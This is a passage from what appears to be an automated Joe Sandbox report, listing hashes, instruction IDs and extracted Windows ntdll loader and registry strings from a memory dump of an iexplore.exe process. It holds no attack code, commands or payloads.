                                                                                                                                                                              • Opcode Fuzzy Hash: cc8a358edb338b95bc318b799cf23a736fe0f207476f511dcc0974afda1a73fa
                                                                                                                                                                              • Instruction Fuzzy Hash: D7B1AD3AA257058FDF25DF69D881BADB7B5AF44305F19852DE915EB380D770E880CB40
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                              • API String ID: 0-2391371766
                                                                                                                                                                              • Opcode ID: 982754b1c2d60c63e91e2deab50d4d986b426cd7ca3fdd5e39e2557c691bbb59
                                                                                                                                                                              • Instruction ID: 3245930f963398b82b1c13c231dba55ffa45e377d932ee209425ae28e19d4286
                                                                                                                                                                              • Opcode Fuzzy Hash: 982754b1c2d60c63e91e2deab50d4d986b426cd7ca3fdd5e39e2557c691bbb59
                                                                                                                                                                              • Instruction Fuzzy Hash: 42B1AF79615745AFE721EF54CCE0F6BB7ECAB44720F040929FA50AB290DB70E844CB92
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                              • API String ID: 0-2779062949
                                                                                                                                                                              • Opcode ID: 48d854c6919ae143b9a84ae80bf0b20857b10f37bca4b3c9db5b0ff3f64de3b2
                                                                                                                                                                              • Instruction ID: e49f34122ee4826337b987dcd660bfb3aa2cfdf3969bf55078b6db61bb9204b4
                                                                                                                                                                              • Opcode Fuzzy Hash: 48d854c6919ae143b9a84ae80bf0b20857b10f37bca4b3c9db5b0ff3f64de3b2
                                                                                                                                                                              • Instruction Fuzzy Hash: B7A188759206299BDB31DF64CC88BAAB7B8FF44710F1401EAE909AB250DB759EC4CF50
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                                                              • API String ID: 0-318774311
                                                                                                                                                                              • Opcode ID: 22db1d501a53e2fccf759f3138e41371c27c2390cf558d1e8c1c08b2ee81d75f
                                                                                                                                                                              • Instruction ID: 3b9d475ba433412a9cabc73113cb85f2f0a00404497855d9d1bf67819fcea239
                                                                                                                                                                              • Opcode Fuzzy Hash: 22db1d501a53e2fccf759f3138e41371c27c2390cf558d1e8c1c08b2ee81d75f
                                                                                                                                                                              • Instruction Fuzzy Hash: 0D81AD79618340AFE719DB14C884B6ABBE8FF84760F08092DF9849B390DB74D954CB62
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: %$&$@
                                                                                                                                                                              • API String ID: 0-1537733988
                                                                                                                                                                              • Opcode ID: eba3001c0ae27261717f3bd507ef418ad1c6b687dbf1289a7cb559bfca05d192
                                                                                                                                                                              • Instruction ID: 611c0c35db2c8e01ea1aeadb76de74b27671a828b872e0f95c27eeb968ef13d7
                                                                                                                                                                              • Opcode Fuzzy Hash: eba3001c0ae27261717f3bd507ef418ad1c6b687dbf1289a7cb559bfca05d192
                                                                                                                                                                              • Instruction Fuzzy Hash: 9C71CF749283029FC714DF24C580AABFBF9BF85798F14891DE69A4B250C770D9C5CB92
                                                                                                                                                                              Strings
                                                                                                                                                                              • GlobalizationUserSettings, xrefs: 0335B834
                                                                                                                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0335B82A
                                                                                                                                                                              • TargetNtPath, xrefs: 0335B82F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                              • API String ID: 0-505981995
                                                                                                                                                                              • Opcode ID: 395331770fe9a214dc27701cab8287afb50eeded73d0e693d3ddd8243a635571
                                                                                                                                                                              • Instruction ID: 5e49494c79ebac79f8db7b52b6039149d39a4543960ec0f27e4884756c69c281
                                                                                                                                                                              • Opcode Fuzzy Hash: 395331770fe9a214dc27701cab8287afb50eeded73d0e693d3ddd8243a635571
                                                                                                                                                                              • Instruction Fuzzy Hash: 49615A76951629ABDB21EB54DC88F9AF7B8AF04750F0101E9F908AB250DB749E84CF90
                                                                                                                                                                              Strings
                                                                                                                                                                              • HEAP: , xrefs: 032DE6B3
                                                                                                                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 032DE6C6
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 032DE6A6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                              • API String ID: 0-1340214556
                                                                                                                                                                              • Opcode ID: 874fcf9e0d873d3f96f76411d7f15b666fb9c71320bc1384c32c939d1d6d4916
                                                                                                                                                                              • Instruction ID: c993ea30954f466d26e7cde9f86c254c99442da678cf94429fff860a1ec36e95
                                                                                                                                                                              • Opcode Fuzzy Hash: 874fcf9e0d873d3f96f76411d7f15b666fb9c71320bc1384c32c939d1d6d4916
                                                                                                                                                                              • Instruction Fuzzy Hash: F9511635624745EFE712DBA8D994BAABBF8FF05300F0800A5E5518F692D3B4E990CB60
                                                                                                                                                                              Strings
                                                                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 032F82D7
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 032F82E8
                                                                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 032F82DE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-1783798831
                                                                                                                                                                              • Opcode ID: a02dd6d144c3532c94df809aed8927c87e0334d6784edc5a3646d04c27ac663b
                                                                                                                                                                              • Instruction ID: 10b9a046394c66602d6c3f8f9b233fffbd5c30ed693a23e45ed8493dcb6afc05
                                                                                                                                                                              • Opcode Fuzzy Hash: a02dd6d144c3532c94df809aed8927c87e0334d6784edc5a3646d04c27ac663b
                                                                                                                                                                              • Instruction Fuzzy Hash: EC41D1B5564714ABC730FB24D885B9BB7ECEF44750F04492AF9449B290E7B0E8808B91
                                                                                                                                                                              Strings
                                                                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 032F1B4A
                                                                                                                                                                              • LdrpAllocateTls, xrefs: 032F1B40
                                                                                                                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 032F1B39
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                              • API String ID: 0-4274184382
                                                                                                                                                                              • Opcode ID: cc5659636b9817d76ecba1dcbdcdda59750d5fe5a2d3979b77c2f9c704a20973
                                                                                                                                                                              • Instruction ID: 7ee39bd755a12028b4e9b24f086d84b51671d54ea4f57eb1d14ce7053ef201ec
                                                                                                                                                                              • Opcode Fuzzy Hash: cc5659636b9817d76ecba1dcbdcdda59750d5fe5a2d3979b77c2f9c704a20973
                                                                                                                                                                              • Instruction Fuzzy Hash: DB41BC79A20609EFDB15DFA8C880BAEF7F5FF48300F148129E505AB250D7B4A890DF90
                                                                                                                                                                              Strings
                                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0333C1C5
                                                                                                                                                                              • PreferredUILanguages, xrefs: 0333C212
                                                                                                                                                                              • @, xrefs: 0333C1F1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                              • API String ID: 0-2968386058
                                                                                                                                                                              • Opcode ID: 90a6552ab728a70461245381bec15c8d5808c75fb8a229e8954c0e2a34e76e82
                                                                                                                                                                              • Instruction ID: 0fb6fb84711d4f6b098dc3301e128fb42435b14ec28b9e0bc9dc2eef6377c376
                                                                                                                                                                              • Opcode Fuzzy Hash: 90a6552ab728a70461245381bec15c8d5808c75fb8a229e8954c0e2a34e76e82
                                                                                                                                                                              • Instruction Fuzzy Hash: F5416D76E14219EFDF11DAD4CC81BEEF7BCAB05700F14816AE905F7290D7B49A848B90
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                              • API String ID: 0-1373925480
                                                                                                                                                                              • Opcode ID: 59e9d0b24ca0cef77e6fe701625559912badc47724cf829541f8dd313b9c0453
                                                                                                                                                                              • Instruction ID: ff5dc5d2db63f31390148be3817fb5f8a60930e9939dbf8da609913737ba4a46
                                                                                                                                                                              • Opcode Fuzzy Hash: 59e9d0b24ca0cef77e6fe701625559912badc47724cf829541f8dd313b9c0453
                                                                                                                                                                              • Instruction Fuzzy Hash: DE4111359107588BEB29DBA6CC80BADF7B8FF45340F28046AD901EF781DB748992CB50
                                                                                                                                                                              Strings
                                                                                                                                                                              • LdrpCheckRedirection, xrefs: 0330488F
                                                                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03304888
                                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03304899
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                              • API String ID: 0-3154609507
                                                                                                                                                                              • Opcode ID: 7b9f9595facab2473b5733cb2684da4acb8c75409b99f70c340a876607cb19b7
                                                                                                                                                                              • Instruction ID: f7ca66b04d0684ef637015fad350aa6beed4c11817e760c370a424bc5b0ab894
                                                                                                                                                                              • Opcode Fuzzy Hash: 7b9f9595facab2473b5733cb2684da4acb8c75409b99f70c340a876607cb19b7
                                                                                                                                                                              • Instruction Fuzzy Hash: 8A41F732A007509FCB21DE1AD8E0A26B7E8EF89B51F090959FE59DB791D331DA00CF81
                                                                                                                                                                              Strings
                                                                                                                                                                              • Actx , xrefs: 032B33AC
                                                                                                                                                                              • SXS: %s() passed the empty activation context data, xrefs: 032F29FE
                                                                                                                                                                              • RtlCreateActivationContext, xrefs: 032F29F9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                              • API String ID: 0-859632880
                                                                                                                                                                              • Opcode ID: 0e813cbad871e0bcf2bd85f145c8bca15264067ac608bf458695142472291cd6
                                                                                                                                                                              • Instruction ID: aabe44214c7d1146c47abc473a9a14bcb797d40bfac9dc5e1eaf48e12bc911e8
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e813cbad871e0bcf2bd85f145c8bca15264067ac608bf458695142472291cd6
                                                                                                                                                                              • Instruction Fuzzy Hash: 8731243A620306DFDB22DE58C890B96B7B4BB45750F294569EF04DF282C770E8C1C790
                                                                                                                                                                              Strings
                                                                                                                                                                              • LdrpInitializeTls, xrefs: 032F1A47
                                                                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 032F1A51
                                                                                                                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 032F1A40
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                              • API String ID: 0-931879808
                                                                                                                                                                              • Opcode ID: d6758745f4024da9c53942a6cefc8be665840ed388a8584756d5f32435ad2b1c
                                                                                                                                                                              • Instruction ID: 3fcefee4dc8c953da7427affeb3900bdf6dd2aa3f5401a2d480f6a88022491c1
                                                                                                                                                                              • Opcode Fuzzy Hash: d6758745f4024da9c53942a6cefc8be665840ed388a8584756d5f32435ad2b1c
                                                                                                                                                                              • Instruction Fuzzy Hash: 5831E475A30305AFFB28DB44C895FEAB2BCEB45794F090169E605AB190D7B0BDD48B90
                                                                                                                                                                              Strings
                                                                                                                                                                              • BuildLabEx, xrefs: 032C130F
                                                                                                                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 032C127B
                                                                                                                                                                              • @, xrefs: 032C12A5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                              • API String ID: 0-3051831665
                                                                                                                                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                                                              • Instruction ID: 11114c3ddd3cdd92baebaba297f97c4d5e19c75d4ae0e12748b60585e9c03dc0
                                                                                                                                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                                                              • Instruction Fuzzy Hash: AA31D076920658AFCF12EB95CC01EDEBBBDEB84710F004529E504AB260DB70EA81CB50
                                                                                                                                                                              Strings
                                                                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 033020F3
                                                                                                                                                                              • LdrpInitializationFailure, xrefs: 033020FA
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03302104
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-2986994758
                                                                                                                                                                              • Opcode ID: bf21403d153c148d91b18d9cc05a7ccdf1cc78ec98f71d708ec81557373215f3
                                                                                                                                                                              • Instruction ID: c92fe0afd7bf35e8daa93701f06308104a06bdfa85a6e187734a6fee42b47c7c
                                                                                                                                                                              • Opcode Fuzzy Hash: bf21403d153c148d91b18d9cc05a7ccdf1cc78ec98f71d708ec81557373215f3
                                                                                                                                                                              • Instruction Fuzzy Hash: A0F04634660348BFE728E60CDC96F9A77ACEB40B54F040468FA00BB6C5D2F0E980CA91
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                              • String ID: #%u
                                                                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                                                                              • Opcode ID: ee5e2c770fba78c2f61bbbb7d279a00792f689139b499092f0a13dcb46440578
                                                                                                                                                                              • Instruction ID: 7ec169ab99e6be63a97dcef5d54799a799774207c963c6235cbee7f933041503
                                                                                                                                                                              • Opcode Fuzzy Hash: ee5e2c770fba78c2f61bbbb7d279a00792f689139b499092f0a13dcb46440578
                                                                                                                                                                              • Instruction Fuzzy Hash: 49716B75A1024A9FDF05DFA9C991BAEB7F8FF08304F144065E905EB251EA74ED81CBA0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                                              • Opcode ID: 49a5965f47579e440e69f34c604cba06190f6d1f173fa95afbb2c26b544f40be
                                                                                                                                                                              • Instruction ID: c9299efa78e758223033bbdd0c4f2a8faa9eec07c142e5d2ba41811550e4b854
                                                                                                                                                                              • Opcode Fuzzy Hash: 49a5965f47579e440e69f34c604cba06190f6d1f173fa95afbb2c26b544f40be
                                                                                                                                                                              • Instruction Fuzzy Hash: 0132AF746283128BEB25CF15C48077EF7E5AF8A740F68491EF9859B290E774D9C0CB92
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: `$`
                                                                                                                                                                              • API String ID: 0-197956300
                                                                                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                              • Instruction ID: 780d4823255aa9a2a46cb818668a043259fc58fe625b645708e437d34833f5e9
                                                                                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                              • Instruction Fuzzy Hash: CCC1CE312583429BEB24CF28CD81B6BFBE5AF84318F084A2DF595CA290D779E545CB91
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                                                                              • Opcode ID: 52cc1f5b1548d89daff22ac069b0294f55adcdccf81c79ff46005d7a001f6826
                                                                                                                                                                              • Instruction ID: c3a85eed643fa175a6ea08cb70414fa5140b9bd91f16756c8c7381aa4d4c39e4
                                                                                                                                                                              • Opcode Fuzzy Hash: 52cc1f5b1548d89daff22ac069b0294f55adcdccf81c79ff46005d7a001f6826
                                                                                                                                                                              • Instruction Fuzzy Hash: 92613D71E203099FDB25DFA89850BADF7B9FF44700F154079E649EB261D771A980CB50
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$$
                                                                                                                                                                              • API String ID: 0-233714265
                                                                                                                                                                              • Opcode ID: 0e3bac2fba329437009e59cf3e27f3d9faa5d12763bb0e657b7cd39cda358adb
                                                                                                                                                                              • Instruction ID: 62975fd702179ba2c8c0cfbe6f7e8ba833ee243b3aea6edce27148bf418f77aa
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e3bac2fba329437009e59cf3e27f3d9faa5d12763bb0e657b7cd39cda358adb
                                                                                                                                                                              • Instruction Fuzzy Hash: B761E235A2074AEFEF60DF64D684BACB7B5FF04704F18446AD515AB240C7B4A9C0CB90
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0328A309
                                                                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0328A2FB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                              • API String ID: 0-2876891731
                                                                                                                                                                              • Opcode ID: 746378f166524077c56ee28d310d105abd99b4e866ebeb547247624d8f8e9bc3
                                                                                                                                                                              • Instruction ID: 24b62d758821ee86d9e9855124423aca0be4dc157805a00ec61331ed64523e5b
                                                                                                                                                                              • Opcode Fuzzy Hash: 746378f166524077c56ee28d310d105abd99b4e866ebeb547247624d8f8e9bc3
                                                                                                                                                                              • Instruction Fuzzy Hash: E541D334A2574ADBDB21EF59C440B6DB7B8FF85700F2844AAEC06DB291EB75D980CB50
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: .Local\$@
                                                                                                                                                                              • API String ID: 0-380025441
                                                                                                                                                                              • Opcode ID: 32fdae319bbda714c0c78607d165ebda7963b6082204a7c461808d6a5ad4deab
                                                                                                                                                                              • Instruction ID: 407c402d5d02ae42c56e943dad0252a06316005ace7cd5aa311af52977dd35bd
                                                                                                                                                                              • Opcode Fuzzy Hash: 32fdae319bbda714c0c78607d165ebda7963b6082204a7c461808d6a5ad4deab
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E31B67A1287459FD711DF18C480A9BBBF8FB84794F48092EF69587210DA70DD848BE2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: MUI
                                                                                                                                                                              • API String ID: 0-1339004836
                                                                                                                                                                              • Opcode ID: 104811bde01cd758c9b41fc47f67a7b19fcdad35e9e3cd485e1ae152b139a229
                                                                                                                                                                              • Instruction ID: 1cef737e474f314249bec5f84cd045ae78413e6f7c893ba0020865777bfb45bc
                                                                                                                                                                              • Opcode Fuzzy Hash: 104811bde01cd758c9b41fc47f67a7b19fcdad35e9e3cd485e1ae152b139a229
                                                                                                                                                                              • Instruction Fuzzy Hash: A8825D75E222198FDB24EFA9C880BADF7B5BF48310F188169D819AB2D4D7709D85CF50
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 59c304bf4ac49f69d7463445096ffb5e33b2f7843754e837359544d96b80e3e9
                                                                                                                                                                              • Instruction ID: 6e15ab9d905f128e436e7f717f235c9c8fbc35f1e23d7ad24899b0cbf184bf09
                                                                                                                                                                              • Opcode Fuzzy Hash: 59c304bf4ac49f69d7463445096ffb5e33b2f7843754e837359544d96b80e3e9
                                                                                                                                                                              • Instruction Fuzzy Hash: 36A18075625742CFD710EF28D480A2ABBF9FF88304F24496EE5858B390D774E985CB92
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 630a4820b25f2d728a9e7385a35a53967a0a5e44a992f73fcf4173238e354b9a
                                                                                                                                                                              • Instruction ID: ef8483ae225914b880047623a50cc80da108ffe0ddca6c38f90307b89ecec086
                                                                                                                                                                              • Opcode Fuzzy Hash: 630a4820b25f2d728a9e7385a35a53967a0a5e44a992f73fcf4173238e354b9a
